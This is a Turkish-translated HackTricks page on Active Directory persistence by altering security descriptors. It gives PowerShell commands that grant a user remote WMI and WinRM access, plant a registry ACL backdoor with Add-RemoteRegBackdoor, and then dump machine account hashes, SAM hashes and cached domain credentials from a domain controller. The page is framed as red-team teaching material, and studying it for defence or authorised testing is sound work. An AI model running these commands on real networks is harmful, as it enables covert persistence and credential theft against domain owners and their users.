Security Descriptors

AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!

HackTricks'ı desteklemenin diğer yolları:

Şirketinizi HackTricks'te reklamını görmek veya HackTricks'i PDF olarak indirmek için ABONELİK PLANLARINI kontrol edin!
Resmi PEASS & HackTricks ürünlerini edinin
The PEASS Ailesi'ni keşfedin, özel NFT'lerimiz koleksiyonumuz
💬 Discord grubuna veya telegram grubuna katılın veya Twitter 🐦 @carlospolopm'ı takip edin.
Hacking hilelerinizi HackTricks ve HackTricks Cloud github depolarına PR göndererek paylaşın.

Güvenlik Tanımlayıcıları

Dökümantasyondan: Güvenlik Tanımlayıcı Tanım Dili (SDDL), bir güvenlik tanımlayıcısını açıklamak için kullanılan formattır. SDDL, DACL ve SACL için ACE dizelerini kullanır: ace_türü;ace_bayrakları;izinler;nesne_kılavuzu;miras_alınan_nesne_kılavuzu;hesap_sid;

Güvenlik tanımlayıcıları, bir nesnenin üzerinde sahip olduğu izinleri depolamak için kullanılır. Bir nesnenin güvenlik tanımlayıcısında sadece küçük bir değişiklik yapabilirseniz, ayrıcalıklı bir gruba üye olmadan o nesne üzerinde çok ilginç ayrıcalıklar elde edebilirsiniz.

Bu kalıcılık tekniği, genellikle yönetici ayrıcalıklarını gerektiren bir görevi yönetici olmadan gerçekleştirebilmek için belirli nesneler üzerinde gereken her ayrıcalığı kazanma yeteneğine dayanır.

WMI Erişimi

Bir kullanıcıya uzaktan WMI yürütme erişimi sağlayabilirsiniz bunu kullanarak:

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose #Remove

WinRM Erişimi

Bir kullanıcıya winrm PS konsoluna erişim sağlamak için şunu kullanın:

Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove

Hash'lerin Uzaktan Erişimi

Kayıt defterine erişin ve hash'leri dökün, DAMP kullanarak bir Reg arka kapısı oluşturun, böylece herhangi bir zamanda bilgisayarın hash'ini, SAM'i ve bilgisayarda önbelleğe alınmış herhangi bir AD kimlik bilgisini alabilirsiniz. Bu nedenle, bu izni bir düzenli kullanıcıya bir Etki Alanı Denetleyici bilgisayarı karşısında vermek çok faydalıdır:

# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose

Güvenlik Tanımlayıcıları

Bir Etki Alanı Denetleyicisinin bilgisayar hesabının karma değerini nasıl kullanabileceğinizi öğrenmek için Gümüş Biletler'e bakın.

AWS hackleme konusunda sıfırdan kahramana dönüşün htARTE (HackTricks AWS Kırmızı Takım Uzmanı) ile öğrenin!

HackTricks'i desteklemenin diğer yolları:

Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek için ABONELİK PLANLARINA göz atın!
Resmi PEASS & HackTricks ürünlerini edinin
Özel NFT'lerden oluşan koleksiyonumuz The PEASS Family'i keşfedin
💬 Discord grubuna veya telegram grubuna katılın veya Twitter 🐦 @carlospolopm'u takip edin.
Hacking hilelerinizi HackTricks ve HackTricks Cloud github depolarına PR göndererek paylaşın.

PreviousResource-based Constrained Delegation NextSID-History Injection

Last updated 2 months ago